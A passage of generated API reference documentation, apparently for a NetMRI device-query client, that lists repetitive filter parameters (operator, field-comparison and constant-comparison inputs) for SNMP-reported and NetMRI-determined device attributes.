:param op_DeviceSysContact: The operator to apply to the field DeviceSysContact. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysContact: The Device sysContact as reported by SNMP. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysContact: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysContact: If op_DeviceSysContact is specified, the field named in this input will be compared to the value in DeviceSysContact using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysContact must be specified if op_DeviceSysContact is specified.
:type val_f_DeviceSysContact: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysContact: If op_DeviceSysContact is specified, this value will be compared to the value in DeviceSysContact using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysContact must be specified if op_DeviceSysContact is specified.
:type val_c_DeviceSysContact: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSysDescr: The operator to apply to the field DeviceSysDescr. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysDescr: The device sysDescr as reported by SNMP. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysDescr: If op_DeviceSysDescr is specified, the field named in this input will be compared to the value in DeviceSysDescr using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysDescr must be specified if op_DeviceSysDescr is specified.
:type val_f_DeviceSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysDescr: If op_DeviceSysDescr is specified, this value will be compared to the value in DeviceSysDescr using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysDescr must be specified if op_DeviceSysDescr is specified.
:type val_c_DeviceSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSysLocation: The operator to apply to the field DeviceSysLocation. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysLocation: The device sysLocation as reported by SNMP. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysLocation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysLocation: If op_DeviceSysLocation is specified, the field named in this input will be compared to the value in DeviceSysLocation using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysLocation must be specified if op_DeviceSysLocation is specified.
:type val_f_DeviceSysLocation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysLocation: If op_DeviceSysLocation is specified, this value will be compared to the value in DeviceSysLocation using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysLocation must be specified if op_DeviceSysLocation is specified.
:type val_c_DeviceSysLocation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSysName: The operator to apply to the field DeviceSysName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysName: The device name as reported by SNMP. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysName: If op_DeviceSysName is specified, the field named in this input will be compared to the value in DeviceSysName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysName must be specified if op_DeviceSysName is specified.
:type val_f_DeviceSysName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysName: If op_DeviceSysName is specified, this value will be compared to the value in DeviceSysName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysName must be specified if op_DeviceSysName is specified.
:type val_c_DeviceSysName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceType: The operator to apply to the field DeviceType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceType: The NetMRI-determined device type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceType: If op_DeviceType is specified, the field named in this input will be compared to the value in DeviceType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceType must be specified if op_DeviceType is specified.
:type val_f_DeviceType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceType: If op_DeviceType is specified, this value will be compared to the value in DeviceType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceType must be specified if op_DeviceType is specified.
:type val_c_DeviceType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceUniqueKey: The operator to apply to the field DeviceUniqueKey. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceUniqueKey: Unique key which allows duplicates detecting over different Virtual Networks. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceUniqueKey: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceUniqueKey: If op_DeviceUniqueKey is specified, the field named in this input will be compared to the value in DeviceUniqueKey using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceUniqueKey must be specified if op_DeviceUniqueKey is specified.
:type val_f_DeviceUniqueKey: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceUniqueKey: If op_DeviceUniqueKey is specified, this value will be compared to the value in DeviceUniqueKey using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceUniqueKey must be specified if op_DeviceUniqueKey is specified.
:type val_c_DeviceUniqueKey: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceVendor: The operator to apply to the field DeviceVendor. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceVendor: The device vendor name. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceVendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceVendor: If op_DeviceVendor is specified, the field named in this input will be compared to the value in DeviceVendor using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceVendor must be specified if op_DeviceVendor is specified.
:type val_f_DeviceVendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceVendor: If op_DeviceVendor is specified, this value will be compared to the value in DeviceVendor using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceVendor must be specified if op_DeviceVendor is specified.
:type val_c_DeviceVendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceVersion: The operator to apply to the field DeviceVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceVersion: The device OS version. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceVersion: If op_DeviceVersion is specified, the field named in this input will be compared to the value in DeviceVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceVersion must be specified if op_DeviceVersion is specified.
:type val_f_DeviceVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceVersion: If op_DeviceVersion is specified, this value will be compared to the value in DeviceVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceVersion must be specified if op_DeviceVersion is specified.
:type val_c_DeviceVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterProvisionData: The operator to apply to the field FilterProvisionData. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterProvisionData: Internal data - do not modify, may change without warning. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterProvisionData: If op_FilterProvisionData is specified, the field named in this input will be compared to the value in FilterProvisionData using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterProvisionData must be specified if op_FilterProvisionData is specified.
:type val_f_FilterProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterProvisionData: If op_FilterProvisionData is specified, this value will be compared to the value in FilterProvisionData using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterProvisionData must be specified if op_FilterProvisionData is specified.
:type val_c_FilterProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilteringInd: The operator to apply to the field FilteringInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilteringInd: A flag indicating whether this device is eligible for Security Device Controller For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilteringInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilteringInd: If op_FilteringInd is specified, the field named in this input will be compared to the value in FilteringInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilteringInd must be specified if op_FilteringInd is specified.
:type val_f_FilteringInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilteringInd: If op_FilteringInd is specified, this value will be compared to the value in FilteringInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilteringInd must be specified if op_FilteringInd is specified.
:type val_c_FilteringInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceChangedCols: The operator to apply to the field InfraDeviceChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceChangedCols: If op_InfraDeviceChangedCols is specified, the field named in this input will be compared to the value in InfraDeviceChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceChangedCols must be specified if op_InfraDeviceChangedCols is specified.
:type val_f_InfraDeviceChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceChangedCols: If op_InfraDeviceChangedCols is specified, this value will be compared to the value in InfraDeviceChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceChangedCols must be specified if op_InfraDeviceChangedCols is specified.
:type val_c_InfraDeviceChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceEndTime: The operator to apply to the field InfraDeviceEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceEndTime: If op_InfraDeviceEndTime is specified, the field named in this input will be compared to the value in InfraDeviceEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceEndTime must be specified if op_InfraDeviceEndTime is specified.
:type val_f_InfraDeviceEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceEndTime: If op_InfraDeviceEndTime is specified, this value will be compared to the value in InfraDeviceEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceEndTime must be specified if op_InfraDeviceEndTime is specified.
:type val_c_InfraDeviceEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceStartTime: The operator to apply to the field InfraDeviceStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceStartTime: If op_InfraDeviceStartTime is specified, the field named in this input will be compared to the value in InfraDeviceStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceStartTime must be specified if op_InfraDeviceStartTime is specified.
:type val_f_InfraDeviceStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceStartTime: If op_InfraDeviceStartTime is specified, this value will be compared to the value in InfraDeviceStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceStartTime must be specified if op_InfraDeviceStartTime is specified.
:type val_c_InfraDeviceStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceTimestamp: The operator to apply to the field InfraDeviceTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceTimestamp: The date and time this record was collected. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceTimestamp: If op_InfraDeviceTimestamp is specified, the field named in this input will be compared to the value in InfraDeviceTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceTimestamp must be specified if op_InfraDeviceTimestamp is specified.
:type val_f_InfraDeviceTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceTimestamp: If op_InfraDeviceTimestamp is specified, this value will be compared to the value in InfraDeviceTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceTimestamp must be specified if op_InfraDeviceTimestamp is specified.
:type val_c_InfraDeviceTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_MgmtServerDeviceID: The operator to apply to the field MgmtServerDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. MgmtServerDeviceID: The Device ID of the management server for the device For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_MgmtServerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_MgmtServerDeviceID: If op_MgmtServerDeviceID is specified, the field named in this input will be compared to the value in MgmtServerDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_MgmtServerDeviceID must be specified if op_MgmtServerDeviceID is specified.
:type val_f_MgmtServerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_MgmtServerDeviceID: If op_MgmtServerDeviceID is specified, this value will be compared to the value in MgmtServerDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_MgmtServerDeviceID must be specified if op_MgmtServerDeviceID is specified.
:type val_c_MgmtServerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NetworkDeviceInd: The operator to apply to the field NetworkDeviceInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NetworkDeviceInd: A flag indicating whether this device is a network device or an end host. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NetworkDeviceInd: If op_NetworkDeviceInd is specified, the field named in this input will be compared to the value in NetworkDeviceInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_f_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NetworkDeviceInd: If op_NetworkDeviceInd is specified, this value will be compared to the value in NetworkDeviceInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_c_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ParentDeviceID: The operator to apply to the field ParentDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ParentDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ParentDeviceID: If op_ParentDeviceID is specified, the field named in this input will be compared to the value in ParentDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ParentDeviceID must be specified if op_ParentDeviceID is specified.
:type val_f_ParentDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ParentDeviceID: If op_ParentDeviceID is specified, this value will be compared to the value in ParentDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ParentDeviceID must be specified if op_ParentDeviceID is specified.
:type val_c_ParentDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RoutingInd: The operator to apply to the field RoutingInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RoutingInd: A flag indicating whether this device is configured with any routing capability and whether a routing table was retrieved from this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RoutingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RoutingInd: If op_RoutingInd is specified, the field named in this input will be compared to the value in RoutingInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RoutingInd must be specified if op_RoutingInd is specified.
:type val_f_RoutingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RoutingInd: If op_RoutingInd is specified, this value will be compared to the value in RoutingInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RoutingInd must be specified if op_RoutingInd is specified.
:type val_c_RoutingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SwitchingInd: The operator to apply to the field SwitchingInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SwitchingInd: A flag indicating whether a switch port forwarding table was retrieved from this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SwitchingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SwitchingInd: If op_SwitchingInd is specified, the field named in this input will be compared to the value in SwitchingInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SwitchingInd must be specified if op_SwitchingInd is specified.
:type val_f_SwitchingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SwitchingInd: If op_SwitchingInd is specified, this value will be compared to the value in SwitchingInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SwitchingInd must be specified if op_SwitchingInd is specified.
:type val_c_SwitchingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VirtualInd: The operator to apply to the field VirtualInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VirtualInd: A flag indicating if the source device is a virtual device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VirtualInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VirtualInd: If op_VirtualInd is specified, the field named in this input will be compared to the value in VirtualInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VirtualInd must be specified if op_VirtualInd is specified.
:type val_f_VirtualInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VirtualInd: If op_VirtualInd is specified, this value will be compared to the value in VirtualInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VirtualInd must be specified if op_VirtualInd is specified.
:type val_c_VirtualInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VirtualNetworkID: The operator to apply to the field VirtualNetworkID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VirtualNetworkID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VirtualNetworkID: If op_VirtualNetworkID is specified, the field named in this input will be compared to the value in VirtualNetworkID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VirtualNetworkID must be specified if op_VirtualNetworkID is specified.
:type val_f_VirtualNetworkID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VirtualNetworkID: If op_VirtualNetworkID is specified, this value will be compared to the value in VirtualNetworkID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VirtualNetworkID must be specified if op_VirtualNetworkID is specified.
:type val_c_VirtualNetworkID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VirtualNetworkingInd: The operator to apply to the field VirtualNetworkingInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VirtualNetworkingInd: Set to null, 0 or 1. 0 indicates this is not a VRF Aware device. 1 Indicates it is VRF Aware. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VirtualNetworkingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VirtualNetworkingInd: If op_VirtualNetworkingInd is specified, the field named in this input will be compared to the value in VirtualNetworkingInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VirtualNetworkingInd must be specified if op_VirtualNetworkingInd is specified.
:type val_f_VirtualNetworkingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VirtualNetworkingInd: If op_VirtualNetworkingInd is specified, this value will be compared to the value in VirtualNetworkingInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VirtualNetworkingInd must be specified if op_VirtualNetworkingInd is specified.
:type val_c_VirtualNetworkingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_available_mgmt_ips: The operator to apply to the field available_mgmt_ips. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. available_mgmt_ips: Available Management IPs for a device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_available_mgmt_ips: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_available_mgmt_ips: If op_available_mgmt_ips is specified, the field named in this input will be compared to the value in available_mgmt_ips using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_available_mgmt_ips must be specified if op_available_mgmt_ips is specified.
:type val_f_available_mgmt_ips: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_available_mgmt_ips: If op_available_mgmt_ips is specified, this value will be compared to the value in available_mgmt_ips using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_available_mgmt_ips must be specified if op_available_mgmt_ips is specified.
:type val_c_available_mgmt_ips: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_admin_status_ind: The operator to apply to the field cap_admin_status_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_admin_status_ind: Capability of changing the Admin Status of an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_admin_status_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_admin_status_ind: If op_cap_admin_status_ind is specified, the field named in this input will be compared to the value in cap_admin_status_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_admin_status_ind must be specified if op_cap_admin_status_ind is specified.
:type val_f_cap_admin_status_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_admin_status_ind: If op_cap_admin_status_ind is specified, this value will be compared to the value in cap_admin_status_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_admin_status_ind must be specified if op_cap_admin_status_ind is specified.
:type val_c_cap_admin_status_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_admin_status_na_reason: The operator to apply to the field cap_admin_status_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_admin_status_na_reason: Reason of non ability of changing the Admin Status of an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_admin_status_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_admin_status_na_reason: If op_cap_admin_status_na_reason is specified, the field named in this input will be compared to the value in cap_admin_status_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_admin_status_na_reason must be specified if op_cap_admin_status_na_reason is specified.
:type val_f_cap_admin_status_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_admin_status_na_reason: If op_cap_admin_status_na_reason is specified, this value will be compared to the value in cap_admin_status_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_admin_status_na_reason must be specified if op_cap_admin_status_na_reason is specified.
:type val_c_cap_admin_status_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_description_ind: The operator to apply to the field cap_description_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_description_ind: Capability of changing the description of an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_description_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_description_ind: If op_cap_description_ind is specified, the field named in this input will be compared to the value in cap_description_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_description_ind must be specified if op_cap_description_ind is specified.
:type val_f_cap_description_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_description_ind: If op_cap_description_ind is specified, this value will be compared to the value in cap_description_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_description_ind must be specified if op_cap_description_ind is specified.
:type val_c_cap_description_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_description_na_reason: The operator to apply to the field cap_description_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_description_na_reason: Reason of non ability of changing the description of an interface of this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_description_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_description_na_reason: If op_cap_description_na_reason is specified, the field named in this input will be compared to the value in cap_description_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_description_na_reason must be specified if op_cap_description_na_reason is specified.
:type val_f_cap_description_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_description_na_reason: If op_cap_description_na_reason is specified, this value will be compared to the value in cap_description_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_description_na_reason must be specified if op_cap_description_na_reason is specified.
:type val_c_cap_description_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
